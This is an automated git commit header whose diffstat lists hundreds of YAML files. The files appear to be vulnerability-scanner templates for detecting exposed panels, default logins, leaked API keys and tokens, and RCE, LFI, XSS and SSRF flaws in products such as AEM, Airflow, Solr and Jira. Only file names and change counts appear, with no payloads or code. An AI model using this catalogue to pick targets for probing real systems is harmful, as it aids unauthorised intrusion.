From e9942e3caba55fdf3ee173495d3bb9a7a62f1410 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 9 Jun 2024 12:33:22 +0000 Subject: [PATCH] 20240609 --- date.txt | 2 +- poc.txt | 3008 +- poc/adobe/adobe-coldfusion-detect-82.yaml | 62 - poc/adobe/adobe-coldfusion-detect-83.yaml | 9 +- .../adobe-coldfusion-error-detect-86.yaml | 29 + ...aml => adobe-coldfusion-error-detect.yaml} | 0 poc/adobe/adobe-component-login-89.yaml | 32 + poc/adobe/adobe-component-login-90.yaml | 31 - poc/adobe/adobe-component-login-91.yaml | 23 + poc/adobe/adobe-component-login-92.yaml | 8 +- ...ml => adobe-connect-central-login-96.yaml} | 0 .../adobe-connect-username-exposure-100.yaml | 27 - .../adobe-connect-username-exposure-101.yaml | 52 +- .../adobe-connect-username-exposure-98.yaml | 3 +- poc/adobe/adobe-connect-version-104.yaml | 32 - ...on-102.yaml => adobe-connect-version.yaml} | 0 .../adobe-experience-manager-login-105.yaml | 33 - .../adobe-experience-manager-login-106.yaml | 23 + .../adobe-experience-manager-login-109.yaml | 10 +- poc/adobe/adobe-media-server-114.yaml | 23 + poc/adobe/adobe-media-server-115.yaml | 11 +- poc/adobe/adobe-media-server.yaml | 30 - poc/adobe/aem-bg-servlet-129.yaml | 29 - poc/adobe/aem-bg-servlet.yaml | 24 + poc/adobe/aem-cached-pages.yaml | 17 +- ....yaml => aem-default-get-servlet-135.yaml} | 0 poc/adobe/aem-default-login-140.yaml | 56 - poc/adobe/aem-default-login-141.yaml | 8 +- poc/adobe/aem-default-login-142.yaml | 12 +- poc/adobe/aem-gql-servlet-149.yaml | 56 - poc/adobe/aem-gql-servlet-150.yaml | 26 + poc/adobe/aem-groovyconsole-154.yaml | 28 - poc/adobe/aem-groovyconsole-155.yaml | 15 +- poc/adobe/aem-jcr-querybuilder-162.yaml | 28 - poc/adobe/aem-jcr-querybuilder-164.yaml | 54 +- poc/adobe/aem-jcr-querybuilder-165.yaml | 31 + poc/adobe/aem-jcr-querybuilder-166.yaml | 7 +- ...tus-169.yaml => aem-login-status-167.yaml} | 0 poc/adobe/aem-merge-metadata-servlet-172.yaml | 10 +- poc/adobe/aem-merge-metadata-servlet-174.yaml | 24 - ...m-querybuilder-internal-path-read-179.yaml | 30 + ...m-querybuilder-internal-path-read-180.yaml | 24 - .../aem-querybuilder-json-servlet-182.yaml | 72 +- poc/adobe/aem-secrets.yaml | 44 + poc/adobe/aem-setpreferences-xss.yaml | 30 - poc/adobe/aem-userinfo-servlet-192.yaml | 32 - poc/adobe/aem-userinfo-servlet-193.yaml | 25 + poc/adobe/aem-userinfo-servlet.yaml | 10 +- ...ml => aem-xss-childlist-selector-198.yaml} | 0 poc/adobe/aem-xss-childlist-selector.yaml | 37 - poc/adobe/possible-AEM-secrets.yaml | 46 - .../airflow-configuration-exposure-230.yaml | 28 + .../airflow-configuration-exposure.yaml | 16 - poc/airflow/airflow-debug-231.yaml | 26 + poc/airflow/airflow-debug-233.yaml | 29 - poc/airflow/airflow-debug.yaml | 10 +- poc/airflow/airflow-default-login-236.yaml | 21 +- poc/airflow/airflow-detect-239.yaml | 24 - poc/airflow/airflow-detect-240.yaml | 24 + poc/airflow/airflow-panel-242.yaml | 24 + ...-panel-241.yaml => airflow-panel-244.yaml} | 0 poc/airflow/airflow-panel-245.yaml | 13 +- .../unauthenticated-airflow-10884.yaml | 27 + .../unauthenticated-airflow-10886.yaml | 23 - poc/airflow/unauthenticated-airflow.yaml | 12 +- poc/apache/apache-answer-detect.yaml | 45 + poc/apache/apache-apisix-panel-336.yaml | 7 +- poc/apache/apache-apisix-panel-337.yaml | 25 - poc/apache/apache-apisix-panel-338.yaml | 30 + poc/apache/apache-axis-detect-339.yaml | 32 + ...etect.yaml => apache-axis-detect-341.yaml} | 0 poc/apache/apache-cocoon-detect-342.yaml | 33 - poc/apache/apache-cocoon-detect.yaml | 27 + ...che-detect.yaml => apache-detect-346.yaml} | 0 poc/apache/apache-detect-348.yaml | 60 +- poc/apache/apache-flink-unauth-rce-355.yaml | 50 - poc/apache/apache-httpd-rce-362.yaml | 41 - poc/apache/apache-httpd-rce.yaml | 13 +- poc/apache/apache-solr-file-read-368.yaml | 43 + poc/apache/apache-solr-file-read-369.yaml | 50 - poc/apache/apache-solr-log4j-rce-372.yaml | 36 + poc/apache/apache-solr-log4j-rce.yaml | 63 +- poc/apache/apache-storm-unauth.yaml | 13 +- poc/apache/default-apache-test-all-6814.yaml | 4 +- poc/apache/default-apache-test-all.yaml | 29 - poc/apache/default-apache-test-page-6816.yaml | 6 +- poc/apache/default-apache-test-page-6818.yaml | 5 +- poc/apache/default-apache2-page-6804.yaml | 8 +- poc/apache/default-apache2-page-6806.yaml | 5 +- .../default-apache2-ubuntu-page-6810.yaml | 6 +- poc/apache/default-apache2-ubuntu-page.yaml | 17 - poc/api/alfacgiapi-wordpress-256.yaml | 62 +- poc/api/alfacgiapi-wordpress.yaml | 33 - poc/api/apache-apisix-panel-336.yaml | 7 +- poc/api/apache-apisix-panel-337.yaml | 25 - poc/api/apache-apisix-panel-338.yaml | 30 + poc/api/api-abstractapi-383.yaml | 25 + ...seipdb-384.yaml => api-abuseipdb-385.yaml} | 0 poc/api/api-abuseipdb.yaml | 31 + poc/api/api-accuweather-386.yaml | 29 - poc/api/api-accuweather.yaml | 23 + poc/api/api-adafruit-io-387.yaml | 30 - poc/api/api-adafruit-io.yaml | 24 + poc/api/api-alienvault-388.yaml | 32 - poc/api/api-apigee-edge-391.yaml | 36 - poc/api/api-apigee-edge.yaml | 29 + poc/api/api-appveyor-392.yaml | 31 - poc/api/api-appveyor.yaml | 25 + poc/api/api-bible-394.yaml | 33 + poc/api/api-bible.yaml | 28 - poc/api/api-bingmaps.yaml | 19 - poc/api/api-bitly-396.yaml | 17 +- poc/api/api-bitrise-397.yaml | 33 + poc/api/api-bitrise.yaml | 28 - poc/api/api-block-400.yaml | 31 - poc/api/api-block.yaml | 26 + poc/api/api-blockchain-399.yaml | 8 +- poc/api/api-blockchain.yaml | 27 - poc/api/api-buildkite-402.yaml | 14 +- poc/api/api-buildkite.yaml | 21 - poc/api/api-buttercms-403.yaml | 22 +- poc/api/api-calendly-404.yaml | 14 +- poc/api/api-circleci-406.yaml | 12 +- poc/api/api-circleci.yaml | 18 - poc/api/api-coinapi-408.yaml | 33 - poc/api/api-coinapi.yaml | 28 + poc/api/api-cooperhewitt-411.yaml | 10 +- poc/api/api-debounce-414.yaml | 30 - poc/api/api-debounce.yaml | 25 + poc/api/api-deviantart-415.yaml | 27 + poc/api/api-deviantart.yaml | 21 - poc/api/api-dribbble-416.yaml | 10 +- ...pi-dribbble.yaml => api-dribbble-417.yaml} | 0 poc/api/api-dropbox-418.yaml | 10 +- poc/api/api-europeana-419.yaml | 10 +- poc/api/api-europeana-420.yaml | 21 + poc/api/api-europeana-421.yaml | 12 +- poc/api/api-fastly-424.yaml | 25 + poc/api/{api-fastly.yml => api-fastly.yaml} | 0 poc/api/api-festivo-425.yaml | 31 + poc/api/api-festivo.yaml | 26 - poc/api/api-fortitoken-cloud.yaml | 11 +- poc/api/api-fullhunt-428.yaml | 34 - poc/api/api-fullhunt.yaml | 29 + poc/api/api-google-drive-432.yaml | 28 + poc/api/api-google-drive.yaml | 23 - poc/api/api-hirak-rates-436.yaml | 32 - poc/api/api-hirak-rates.yaml | 27 + poc/api/api-hubspot.yaml | 21 - poc/api/api-iconfinder-439.yaml | 34 + poc/api/api-improvmx-440.yaml | 35 - poc/api/api-improvmx.yaml | 30 + poc/api/api-instagram.yaml | 10 +- poc/api/api-instatus-442.yaml | 34 - poc/api/api-instatus.yaml | 29 + poc/api/api-intercom-443.yaml | 30 + poc/api/api-intercom.yaml | 24 - ...{api-ipstack.yaml => api-ipstack-444.yaml} | 0 poc/api/api-iterable-445.yaml | 23 + poc/api/api-iterable.yaml | 24 - ...-jumpcloud.yaml => api-jumpcloud-446.yaml} | 0 poc/api/api-linkfinder.yaml | 2 +- ...pi-lokalise-452.yaml => api-lokalise.yaml} | 0 poc/api/api-mailchimp-454.yaml | 21 - poc/api/api-mailchimp.yaml | 3 +- poc/api/api-mailgun-455.yaml | 14 +- poc/api/api-malshare-456.yaml | 2 +- poc/api/api-malshare.yaml | 24 + poc/api/api-malwarebazaar-458.yaml | 40 - poc/api/api-malwarebazaar-459.yaml | 12 +- poc/api/api-mapbox-465.yaml | 10 +- poc/api/api-mapbox.yaml | 19 - poc/api/api-mojoauth-466.yaml | 33 - poc/api/api-mojoauth.yaml | 28 + poc/api/api-mywot-467.yaml | 10 +- poc/api/api-mywot-468.yaml | 27 - poc/api/api-netlify-470.yaml | 31 - poc/api/api-netlify.yaml | 25 + poc/api/api-openweather-473.yaml | 13 +- poc/api/api-openweather.yaml | 18 - ...-pagerduty.yaml => api-pagerduty-475.yaml} | 0 poc/api/api-pendo.yaml | 23 + poc/api/api-petfinder-480.yaml | 36 + poc/api/api-petfinder.yaml | 31 - ...acker.yaml => api-pivotaltracker-482.yaml} | 0 poc/api/api-postmark-483.yaml | 26 - poc/api/api-postmark.yaml | 15 +- poc/api/api-rijksmuseum.yaml | 25 - poc/api/api-scanii-487.yaml | 10 +- poc/api/api-scanii-488.yaml | 26 + poc/api/api-sendgrid-489.yaml | 23 - poc/api/api-sendgrid.yaml | 11 +- .../{api-slack-493.yaml => api-slack.yaml} | 0 poc/api/api-sonarcloud-494.yaml | 5 +- poc/api/api-sonarcloud.yaml | 21 + poc/api/api-spotify-495.yaml | 31 - poc/api/api-spotify.yaml | 25 + .../{api-square-496.yaml => api-square.yaml} | 0 poc/api/api-sslmate-497.yaml | 33 - poc/api/api-sslmate.yaml | 28 + poc/api/api-stripe-499.yaml | 25 - poc/api/api-stripe.yaml | 13 +- poc/api/api-taiga-501.yaml | 30 - poc/api/api-taiga.yaml | 24 + poc/api/api-thecatapi-502.yaml | 32 - poc/api/api-thecatapi-503.yaml | 10 +- poc/api/api-tink-504.yaml | 31 - poc/api/api-tink.yaml | 25 + poc/api/api-travisci.yaml | 22 - poc/api/api-virustotal-511.yaml | 15 +- poc/api/api-virustotal-512.yaml | 13 +- poc/api/api-visualstudio-513.yaml | 23 - poc/api/api-visualstudio.yaml | 26 + poc/api/api-wakatime-514.yaml | 14 +- poc/api/api-wakatime.yaml | 19 + poc/api/api-weglot-516.yaml | 24 - poc/api/api-weglot.yaml | 1 + poc/api/api-wordcloud-517.yaml | 45 - poc/api/api-wordcloud-518.yaml | 10 +- poc/api/api-youtube-519.yaml | 28 - poc/api/api-youtube.yaml | 22 + poc/api/apiman-panel-460.yaml | 11 +- poc/api/apiman-panel-462.yaml | 30 - poc/api/apisix-default-login-492.yaml | 20 +- poc/api/arcgis-rest-api.yaml | 15 +- poc/api/bems-api-lfi-709.yaml | 25 - poc/api/bems-api-lfi-711.yaml | 22 +- poc/api/bems-api-lfi-712.yaml | 24 - poc/api/burp-api-detect-810.yaml | 28 + poc/api/burp-api-detect-812.yaml | 27 - poc/api/burp-api-detect.yaml | 3 +- poc/api/etcd-unauthenticated-api.yaml | 26 +- poc/api/exposed-docker-api-7299.yaml | 12 +- poc/api/exposed-glances-api-7308.yaml | 56 +- poc/api/fastapi-docs-7398.yaml | 22 + poc/api/fastapi-docs-7399.yaml | 44 +- poc/api/gitlab-api-user-enum-7668.yaml | 7 +- poc/api/gitlab-api-user-enum.yaml | 16 +- poc/api/gmail-api-client-secrets-7741.yaml | 40 - poc/api/google-api-key-7768.yaml | 9 +- poc/api/graylog-api-browser-7846.yaml | 22 + poc/api/graylog-api-browser.yaml | 23 - ...cd-unauthenticated-api-data-leak-8056.yaml | 28 - ...tp-etcd-unauthenticated-api-data-leak.yaml | 38 + poc/api/kube-api-namespaces-8505.yaml | 25 + poc/api/kube-api-namespaces-8506.yaml | 6 +- poc/api/kube-api-nodes-8507.yaml | 18 +- poc/api/kube-api-nodes-8508.yaml | 25 - poc/api/kube-api-nodes.yaml | 22 - poc/api/kube-api-pods-8510.yaml | 6 +- poc/api/kube-api-pods.yaml | 22 + poc/api/kube-api-services-8513.yaml | 9 +- poc/api/kube-api-services-8514.yaml | 6 +- poc/api/magento-2-exposed-api-8687.yaml | 5 +- poc/api/magento-2-exposed-api-8688.yaml | 45 + poc/api/mailchimp-api-key-8722.yaml | 20 +- poc/api/mailchimp-api-key-8726.yaml | 20 - poc/api/mailchimp-api.yaml | 3 +- ...gun-api-11855.yaml => mailgun-api(1).yaml} | 0 poc/api/pictatic-api-key-9576.yaml | 5 +- poc/api/pictatic-api-key.yaml | 4 - poc/api/sendgrid-api-key-10140.yaml | 2 +- poc/api/sendgrid-api.yaml | 4 + poc/api/slack-api.yaml | 3 +- ...3.yaml => strapi-documentation-10542.yaml} | 0 poc/api/strapi-page-10544.yaml | 3 +- ...trapi-page.yaml => strapi-page-10545.yaml} | 0 poc/api/stripe-api-key(1).yaml | 16 + poc/api/stripe-api-key-11869.yaml | 13 - poc/api/twilio-api-10860.yaml | 13 + poc/api/twilio-api-10861.yaml | 16 - poc/api/twilio-api.yaml | 5 +- poc/api/unauth-spark-api-10963.yaml | 14 +- poc/api/unauth-spark-api.yaml | 30 - poc/api/wadl-api-11082.yaml | 38 - poc/api/wadl-api-11084.yaml | 34 +- poc/api/wadl-api-11085.yaml | 5 - poc/api/wsdl-api-11632.yaml | 18 +- poc/api/wsdl-api-11634.yaml | 15 + poc/api/wso2-apimanager-detect-11638.yaml | 19 - poc/api/yapi-rce-11724.yaml | 27 +- poc/api/yapi-rce-11725.yaml | 86 + poc/atlassian/atlassian-bamboo-panel.yaml | 44 + poc/atlassian/atlassian-crowd-panel-583.yaml | 25 - poc/atlassian/bitbucket-takeover-738.yaml | 21 + poc/atlassian/bitbucket-takeover-739.yaml | 9 +- poc/atlassian/bitbucket-takeover-740.yaml | 21 - poc/atlassian/bitbucket-takeover.yaml | 19 +- poc/atlassian/confluence-detect-1186.yaml | 14 +- poc/atlassian/confluence-detect-1187.yaml | 40 - poc/atlassian/confluence-detect-1189.yaml | 41 + .../confluence-ssrf-sharelinks-1191.yaml | 31 +- .../confluence-ssrf-sharelinks-1192.yaml | 44 + .../confluence-ssrf-sharelinks-1193.yaml | 36 - poc/atlassian/jira-detect-8313.yaml | 25 + poc/atlassian/jira-detect-8314.yaml | 29 - poc/atlassian/jira-detect-8316.yaml | 4 + poc/atlassian/jira-login-default.yaml | 8 +- .../jira-unauthenticated-dashboards-8323.yaml | 11 +- .../jira-unauthenticated-dashboards-8327.yaml | 16 +- ...nauthenticated-installed-gadgets-8328.yaml | 4 - ...nauthenticated-installed-gadgets-8330.yaml | 31 + ...-unauthenticated-popular-filters-8331.yaml | 23 - .../jira-unauthenticated-popular-filters.yaml | 5 +- ...nauthenticated-projectcategories-8334.yaml | 7 +- ...ra-unauthenticated-projectcategories.yaml} | 0 ...jira-unauthenticated-user-picker-8341.yaml | 10 +- poc/atlassian/jira_user_piker (copy 1).yaml | 22 + poc/auth/AVTECH-login-bypass.yaml | 2 + poc/auth/Dynatrace-token (copy 1).yaml | 15 - poc/auth/Dynatrace-token.yaml | 6 +- poc/auth/JeeSite-default-login.yaml | 5 +- poc/auth/Mantis-Default_login.yaml | 47 + poc/auth/Redmine-Default-Login.yaml | 21 - ...login-23.yaml => acemanager-login-24.yaml} | 0 poc/auth/activemq-default-login-44.yaml | 33 - poc/auth/activemq-default-login-46.yaml | 3 +- poc/auth/activemq-default-login-48.yaml | 29 + poc/auth/adobe-component-login-89.yaml | 32 + poc/auth/adobe-component-login-90.yaml | 31 - poc/auth/adobe-component-login-91.yaml | 23 + poc/auth/adobe-component-login-92.yaml | 8 +- ...ml => adobe-connect-central-login-96.yaml} | 0 .../adobe-experience-manager-login-105.yaml | 33 - .../adobe-experience-manager-login-106.yaml | 23 + .../adobe-experience-manager-login-109.yaml | 10 +- poc/auth/aem-default-login-140.yaml | 56 - poc/auth/aem-default-login-141.yaml | 8 +- poc/auth/aem-default-login-142.yaml | 12 +- ...tus-169.yaml => aem-login-status-167.yaml} | 0 poc/auth/aem-secrets.yaml | 44 + ...aml => aims-password-mgmt-client-219.yaml} | 0 poc/auth/aims-password-mgmt-client-221.yaml | 17 + poc/auth/aims-password-portal-225.yaml | 22 + poc/auth/aims-password-portal.yaml | 2 +- poc/auth/airflow-default-login-236.yaml | 21 +- poc/auth/alibaba-mongoshake-unauth-268.yaml | 27 + poc/auth/alibaba-mongoshake-unauth-270.yaml | 10 +- poc/auth/alphaweb-default-login.yaml | 35 - poc/auth/amazon-mws-auth-token-11845.yaml | 11 +- poc/auth/amazon-mws-auth-token-282.yaml | 6 +- poc/auth/amazon-mws-auth-token-283.yaml | 11 +- poc/auth/ambari-default-login-287.yaml | 35 - poc/auth/ambari-default-login-289.yaml | 35 + poc/auth/ambari-default-login-290.yaml | 11 +- poc/auth/amcrest-login-297.yaml | 11 +- poc/auth/ametys-admin-login-300.yaml | 12 +- poc/auth/ametys-admin-login-301.yaml | 31 - poc/auth/ametys-admin-login-302.yaml | 36 + poc/auth/apache-flink-unauth-rce-355.yaml | 50 - poc/auth/apache-storm-unauth.yaml | 13 +- poc/auth/apc-ups-login.yaml | 24 - poc/auth/api-fortitoken-cloud.yaml | 11 +- poc/auth/api-mojoauth-466.yaml | 33 - poc/auth/api-mojoauth.yaml | 28 + poc/auth/apisix-default-login-492.yaml | 20 +- poc/auth/apollo-default-login-520.yaml | 14 +- ...gin-521.yaml => apollo-default-login.yaml} | 0 poc/auth/apple-app-site-association-524.yaml | 6 +- poc/auth/argocd-login-534.yaml | 35 - ...rgocd-login.yaml => argocd-login-536.yaml} | 0 poc/auth/arl-default-login-537.yaml | 44 - poc/auth/arl-default-login-539.yaml | 7 +- poc/auth/arl-default-login-540.yaml | 9 +- poc/auth/arl-default-password.yaml | 4 + poc/auth/atvise-login.yaml | 29 - poc/auth/authelia-panel.yaml | 33 + poc/auth/avatier-password-management-605.yaml | 37 - ....yaml => avatier_password_management.yaml} | 0 poc/auth/aws-access-key-value-624.yaml | 22 + poc/auth/aws-opensearch-login-649.yaml | 24 + poc/auth/aws-opensearch-login-650.yaml | 25 - poc/auth/aws-opensearch-login.yaml | 3 +- .../axiom-digitalocean-key-exposure-666.yaml | 8 +- ...l => axiom-digitalocean-key-exposure.yaml} | 0 poc/auth/azkaban-default-login-674.yaml | 6 +- ...in-673.yaml => azkaban-default-login.yaml} | 0 ...687.yaml => basic-auth-detection-689.yaml} | 0 poc/auth/bazarr-login-702.yaml | 19 + poc/auth/beyondtrust-login-server.yaml | 73 +- ...-726.yaml => bigbluebutton-login-724.yaml} | 0 poc/auth/blue-iris-login-751.yaml | 31 - poc/auth/blue-iris-login-753.yaml | 15 +- poc/auth/blue-iris-login-754.yaml | 22 + poc/auth/braintree-access-token-773.yaml | 4 +- poc/auth/braintree-access-token.yaml | 17 - poc/auth/branch-key-774.yaml | 3 +- ...l => brother-unauthorized-access-793.yaml} | 0 poc/auth/brother-unauthorized-access.yaml | 50 +- poc/auth/canal-default-login-846.yaml | 44 + poc/auth/canal-default-login-848.yaml | 2 +- poc/auth/canal-default-login-849.yaml | 35 - poc/auth/chinaunicom-default-login-906.yaml | 38 - poc/auth/chinaunicom-default-login-908.yaml | 8 +- ...chinaunicom-modem-default-credentials.yaml | 2 - poc/auth/cisco-finesse-login-938.yaml | 22 - poc/auth/cisco-finesse-login-940.yaml | 23 + poc/auth/cisco-integrated-login-941.yaml | 3 +- poc/auth/cisco-systems-login-973.yaml | 25 + poc/auth/cisco-systems-login-975.yaml | 32 - poc/auth/cisco-systems-login.yaml | 12 +- ...-980.yaml => cisco-ucs-kvm-login-979.yaml} | 0 poc/auth/cisco-ucs-kvm-login.yaml | 13 +- poc/auth/clickhouse-unauth-1002.yaml | 25 + poc/auth/clickhouse-unauth-1003.yaml | 26 - poc/auth/clickhouse-unauth-1004.yaml | 8 +- poc/auth/clickhouse-unauth.yaml | 14 +- ...9.yaml => cobbler-default-login-1118.yaml} | 0 poc/auth/cobbler-default-login.yaml | 72 - poc/auth/codian-mcu-login-1139.yaml | 34 - .../coldfusion-administrator-login-1145.yaml | 49 +- .../commax-credentials-disclosure-1158.yaml | 7 +- .../commax-credentials-disclosure-1160.yaml | 36 + poc/auth/cortex-xsoar-login-1225.yaml | 5 +- poc/auth/credential-exposure-1249.yaml | 7 +- poc/auth/credentials-1257.yaml | 16 + poc/auth/credentials-1258.yaml | 16 - poc/auth/credentials-disclosure-1255.yaml | 4152 +- poc/auth/credentials-disclosure-1256.yaml | 708 + poc/auth/credentials.yaml | 11 +- poc/auth/crush-ftp-login-1273.yaml | 21 +- poc/auth/crush-ftp-login-1275.yaml | 23 + poc/auth/crush-ftp-login.yaml | 16 +- poc/auth/crushftp-default-login.yaml | 59 + .../cs-cart-unauthenticated-lfi-1284.yaml | 26 + ....yaml => cs-cart-unauthenticated-lfi.yaml} | 0 poc/auth/cs141-default-login-1277.yaml | 13 +- poc/auth/cs141-default-login-1279.yaml | 18 +- poc/auth/cx-cloud-login-6765.yaml | 4 +- poc/auth/dbeaver-credentials-6780.yaml | 42 - poc/auth/dbeaver-credentials-6782.yaml | 11 +- poc/auth/dell-idrac-default-login-6945.yaml | 2 +- ...943.yaml => dell-idrac-default-login.yaml} | 0 poc/auth/dell-idrac9-default-login-6930.yaml | 32 +- poc/auth/dell-idrac9-default-login-6932.yaml | 11 +- poc/auth/dell-openmanager-login-6949.yaml | 27 - poc/auth/dell-openmanager-login-6951.yaml | 23 - poc/auth/dericam-login-6962.yaml | 9 +- poc/auth/dericam-login.yaml | 18 +- poc/auth/dir-850l-login-panel.yaml | 19 +- poc/auth/directadmin-login-panel-7000.yaml | 23 + poc/auth/django-secret-key.yaml | 31 - poc/auth/django-secret.key.yaml | 62 + .../dolphinscheduler-default-login-7072.yaml | 15 +- .../dolphinscheduler-default-login-7073.yaml | 48 + poc/auth/druid-default-login-7096.yaml | 2 +- poc/auth/druid-default-login.yaml | 17 +- ...ml => dubbo-admin-default-login-7120.yaml} | 0 poc/auth/dubbo-admin-default-login-7121.yaml | 18 +- poc/auth/dvwa-default-login-7129.yaml | 7 - ...ogin-7127.yaml => dvwa-default-login.yaml} | 0 .../dvwa-headless-automatic-login-7130.yaml | 42 - .../dvwa-headless-automatic-login-7131.yaml | 42 + .../dvwa-headless-automatic-login-7133.yaml | 9 + poc/auth/dynatrace-token-7145.yaml | 13 + poc/auth/dynatrace-token-7146.yaml | 16 - poc/auth/emcecom-default-login-7211.yaml | 43 - poc/auth/emcecom-default-login-7212.yaml | 7 +- poc/auth/emqx-default-login-7222.yaml | 35 + poc/auth/emqx-default-login.yaml | 5 +- poc/auth/ems-login-panel-7223.yaml | 18 - .../enable-secret-for-password-user-and-.yaml | 4 +- poc/auth/epmp-login-7229.yaml | 3 +- poc/auth/epmp-login.yaml | 24 - poc/auth/etcd-keys-7261.yaml | 25 - poc/auth/etcd-keys-7262.yaml | 26 - poc/auth/etcd-keys.yaml | 6 +- poc/auth/etcd-unauthenticated-api.yaml | 26 +- poc/auth/exacqvision-default-login-7275.yaml | 17 +- ...77.yaml => exacqvision-default-login.yaml} | 0 poc/auth/faraday-login-7395.yaml | 24 - poc/auth/faraday-login-7397.yaml | 20 - poc/auth/fatpipe-auth-bypass-7431.yaml | 42 + poc/auth/fatpipe-auth-bypass.yaml | 33 - poc/auth/fcm-server-key.yaml | 14 +- .../fireware-xtm-user-authentication.yaml | 13 +- poc/auth/flir-default-login-7514.yaml | 50 - poc/auth/flir-default-login.yaml | 35 + poc/auth/frp-default-login-7556.yaml | 40 - poc/auth/frp-default-login-7557.yaml | 21 +- poc/auth/ftp-credentials-exposure-7568.yaml | 37 - poc/auth/ftp-credentials-exposure.yaml | 22 + poc/auth/ftp-weak-credentials-7570.yaml | 43 - poc/auth/ftp-weak-credentials.yaml | 23 +- poc/auth/fuelcms-default-login-7571.yaml | 16 +- poc/auth/fuelcms-default-login-7572.yaml | 20 +- poc/auth/general-tokens-7580.yaml | 15 +- poc/auth/general-tokens-7583.yaml | 6 +- poc/auth/git-credentials-disclosure-7641.yaml | 32 + ...0.yaml => git-credentials-disclosure.yaml} | 0 poc/auth/gitea-login.yaml | 13 +- poc/auth/gitlab-public-signup-7683.yaml | 26 - .../gitlab-uninitialized-password-7694.yaml | 11 +- .../gitlab-uninitialized-password-7695.yaml | 10 +- poc/auth/gitlab-weak-login-7707.yaml | 12 +- poc/auth/gitlab-weak-login.yaml | 56 - poc/auth/gloo-unauth-7722.yaml | 13 +- poc/auth/glpi-authentication-7730.yaml | 25 - poc/auth/glpi-default-login-7732.yaml | 15 +- poc/auth/glpi-default-login.yaml | 67 + poc/auth/gmail-api-client-secrets-7741.yaml | 40 - poc/auth/gocd-encryption-key.yaml | 8 +- poc/auth/google-api-key-7768.yaml | 9 +- poc/auth/google-earth-dlogin-7781.yaml | 31 + poc/auth/google-earth-dlogin.yaml | 17 +- ...ebook-secrets.yaml => google-secrets.yaml} | 0 poc/auth/gophish-default-login-7792.yaml | 14 +- poc/auth/gophish-default-login-7793.yaml | 19 +- poc/auth/gophish-login-7795.yaml | 20 - poc/auth/gophish-login-7796.yaml | 23 + poc/auth/grafana-public-signup-7814.yaml | 30 + poc/auth/grafana-public-signup.yaml | 14 +- poc/auth/guacamole-default-login-7858.yaml | 12 +- poc/auth/guacamole-default-login-7859.yaml | 38 + poc/auth/guacamole-default-login-7861.yaml | 10 +- poc/auth/hivemanager-login-panel-7966.yaml | 3 +- poc/auth/hongdian-default-login-7997.yaml | 58 + poc/auth/hongdian-default-login-7999.yaml | 50 - .../hp-ilo-serial-key-disclosure-8023.yaml | 24 - .../hp-ilo-serial-key-disclosure-8025.yaml | 27 + poc/auth/hp-ilo-serial-key-disclosure.yaml | 7 +- .../hpe-system-management-login-8017.yaml | 27 + poc/auth/hpe-system-management-login.yaml | 13 +- poc/auth/hrsale-unauthenticated-lfi-8039.yaml | 23 +- poc/auth/hrsale-unauthenticated-lfi-8041.yaml | 9 +- poc/auth/htpasswd-detection-8046.yaml | 25 + ...cd-unauthenticated-api-data-leak-8056.yaml | 28 - ...tp-etcd-unauthenticated-api-data-leak.yaml | 38 + .../huawei-HG532e-default-router-login.yaml | 38 - ...awei-hg532e-default-router-login-8063.yaml | 9 +- poc/auth/huawei-router-auth-bypass-8073.yaml | 20 +- poc/auth/huawei-router-auth-bypass-8076.yaml | 37 + poc/auth/hue-default-credential-8080.yaml | 16 +- poc/auth/hue-default-credential-8081.yaml | 62 - poc/auth/hue-default-credential.yaml | 62 - ...gin-8110.yaml => ibm-note-login-8112.yaml} | 0 .../ibm-storage-default-credential-8124.yaml | 12 +- .../ibm-storage-default-credential-8125.yaml | 21 +- poc/auth/icinga-web-login-8134.yaml | 22 + poc/auth/icinga-web-login-8137.yaml | 23 - poc/auth/icinga-web-login.yaml | 13 +- .../idemia-biometrics-default-login-8138.yaml | 17 +- .../idemia-biometrics-default-login-8139.yaml | 33 - ...idemia-biometrics-default-login-8141.yaml} | 0 poc/auth/iptime-default-login-8193.yaml | 48 - poc/auth/iptime-default-login-8194.yaml | 9 - poc/auth/jellyseerr-login-panel.yaml | 39 - poc/auth/jenkins-login-8277.yaml | 27 - poc/auth/jenkins-login-8280.yaml | 18 + poc/auth/jfrog-unauth-build-exposed-8299.yaml | 30 + poc/auth/jfrog-unauth-build-exposed-8302.yaml | 8 +- poc/auth/jinher-oa-default-login-8311.yaml | 10 +- poc/auth/jinher-oa-default-login-8312.yaml | 52 + poc/auth/jira-login-default.yaml | 8 +- .../jira-unauthenticated-dashboards-8323.yaml | 11 +- .../jira-unauthenticated-dashboards-8327.yaml | 16 +- ...nauthenticated-installed-gadgets-8328.yaml | 4 - ...nauthenticated-installed-gadgets-8330.yaml | 31 + ...-unauthenticated-popular-filters-8331.yaml | 23 - .../jira-unauthenticated-popular-filters.yaml | 5 +- ...nauthenticated-projectcategories-8334.yaml | 7 +- ...ra-unauthenticated-projectcategories.yaml} | 0 ...jira-unauthenticated-user-picker-8341.yaml | 10 +- poc/auth/jmx-default-login-8355.yaml | 38 - poc/auth/jmx-default-login.yaml | 42 + .../jolokia-unauthenticated-lfi-8366.yaml | 31 + ....yaml => jolokia-unauthenticated-lfi.yaml} | 0 poc/auth/jupyter-ipython-unauth-8402.yaml | 21 - poc/auth/jupyter-ipython-unauth-8405.yaml | 15 +- poc/auth/jupyterhub-default-login-8399.yaml | 10 +- poc/auth/jupyterhub-default-login-8400.yaml | 35 - poc/auth/jwt-token-8408.yaml | 13 +- .../{jwt-token-8410.yaml => jwt-token.yaml} | 0 poc/auth/kafka-center-default-login-8415.yaml | 13 +- poc/auth/kafka-center-default-login.yaml | 42 + poc/auth/kafka-center-login.yaml | 19 +- poc/auth/kasm-login-panel.yaml | 49 + poc/auth/keenetic-web-login-8442.yaml | 19 + poc/auth/keenetic-web-login-8443.yaml | 22 - poc/auth/kenesto-login-8445.yaml | 4 + poc/auth/kentico-login-8446.yaml | 23 - poc/auth/kentico-login.yaml | 22 +- poc/auth/key-cloak-admin-panel.yaml | 4 + ...json-8472.yaml => keycloak-json-8473.yaml} | 0 poc/auth/keycloak-json-8474.yaml | 5 +- poc/auth/keycloak-openid-config-8475.yaml | 39 - poc/auth/keycloak-openid-config.yaml | 25 + poc/auth/keycloak-xss-8481.yaml | 5 +- poc/auth/keycloak-xss-8482.yaml | 9 +- poc/auth/kiwitcms-login-8496.yaml | 11 +- ...-unauth.yaml => kubernetes-unauth(1).yaml} | 0 poc/auth/lansweeper-login.yaml | 37 +- poc/auth/linksys-wifi-login.yaml | 21 +- poc/auth/lucee-login-8662.yaml | 3 + poc/auth/lucee-login-8664.yaml | 4 +- 